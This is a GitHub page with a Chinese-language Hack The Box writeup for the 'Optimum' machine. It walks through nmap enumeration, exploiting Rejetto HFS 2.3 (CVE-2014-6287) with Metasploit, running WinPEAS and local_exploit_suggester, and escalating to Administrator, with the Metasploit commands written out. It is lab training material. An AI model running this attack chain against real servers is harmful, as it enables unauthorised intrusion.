R3fr4kt/Optimum

GitHub: R3fr4kt/Optimum

针对 Hack The Box Optimum 靶机的渗透测试 writeup,演示了从利用 Rejetto HttpFileServer 漏洞获取初始访问到 Windows 提权的完整攻击链。

Stars: 0 | Forks: 0

# Optimum # Optimum – Hack The Box Writeup ## 概述 在此靶机中,目标是通过利用易受攻击的 Web 服务获取 Windows 主机的初始访问权限,然后提升权限以获取管理员 flag。 攻击路径包括: * 服务枚举 * 利用 **Rejetto HTTP File Server 2.3** * 通过 **Metasploit** 获取初始访问 * 使用 **WinPEAS** 和 **Metasploit 后渗透模块** 提权 # 侦察 我们首先进行全 TCP 端口扫描,以识别暴露的服务。 ``` nmap -Pn -n -p- --min-rate 5000 -T4 ``` 扫描显示 **端口 80** 处于开放状态。 接下来,我们执行服务和版本扫描。 ``` nmap -p80 -sSCV --min-rate 5000 -T4 ``` 结果识别出以下服务: ``` HttpFileServer 2.3 ``` 该服务对应于 **Rejetto HTTP File Server**,这是一个轻量级的文件共享 Web 服务器。 # 漏洞识别 在研究了检测到的版本后,我们发现了一个已知的漏洞: ``` CVE-2014-6287 ``` 由于输入清理不当,该漏洞允许 **远程代码执行**。 # 漏洞利用 为了利用该漏洞,我们使用 **Metasploit**。 启动 Metasploit: ``` msfconsole -q ``` 搜索合适的模块: ``` search rejetto ``` 加载 exploit 模块: ``` use exploit/windows/http/rejetto_hfs_exec ``` 配置所需选项: ``` set RHOSTS set RPORT set LHOST set LPORT run ``` 执行后,该 exploit 在目标机器上提供了一个 **Meterpreter 会话**。 # 初始访问 利用获得的 Meterpreter 会话,我们浏览文件系统以检索 **user flag**。 ``` cd cat user.txt whoami ``` 命令输出显示我们登录的身份是: ``` kostas ``` 由于该用户没有管理员权限,我们继续进行 **权限提升**。 # 权限提升枚举 为了识别潜在的提权向量,我们上传 **WinPEAS**,这是一个著名的 Windows 权限提升枚举工具。 ``` upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe ``` 然后我们执行它: ``` shell .\wp.exe ``` 输出揭示了有用的信息,包括与用户 **kostas** 相关的凭据。 # 权限提升 在审查了可能的提权向量后,我们使用 Metasploit 模块: ``` local_exploit_suggester ``` 加载该模块: ``` use post/multi/recon/local_exploit_suggester ``` 配置会话: ``` set SESSION run ``` 该模块建议了可用于提升权限的可能本地 exploit。 成功提升权限后,我们获得了一个具有管理员权限的 shell。 验证: ``` shell whoami ``` # 管理员访问 获得管理员权限后,我们导航到 Administrator 目录以检索 **root flag**。 ``` cd \Users\Administrator dir cd Desktop dir type root.txt ``` # 关键要点 此靶机展示了几个重要的渗透测试概念: * 适当的 **服务枚举** 对于识别易受攻击的软件至关重要。 * 诸如 **CVE-2014-6287** 之类的公开已知漏洞可能导致立即的远程代码执行。 * 像 **WinPEAS** 这样的工具有助于识别 Windows 环境中的权限提升机会。 * **Metasploit 后渗透模块** 可以加速权限提升过程。
标签:CISA项目, CTF学习, CTI, CVE-2014-6287, HackTheBox, Meterpreter, Nmap, OPA, Rejetto HFS, Walkthrough, Web报告查看器, Windows提权, WinPEAS, Writeup, 内网渗透, 初始访问, 协议分析, 威胁模拟, 数据统计, 权限提升, 漏洞复现, 端口扫描, 编程工具, 网络安全, 网络安全审计, 虚拟驱动器, 远程代码执行, 隐私保护, 靶场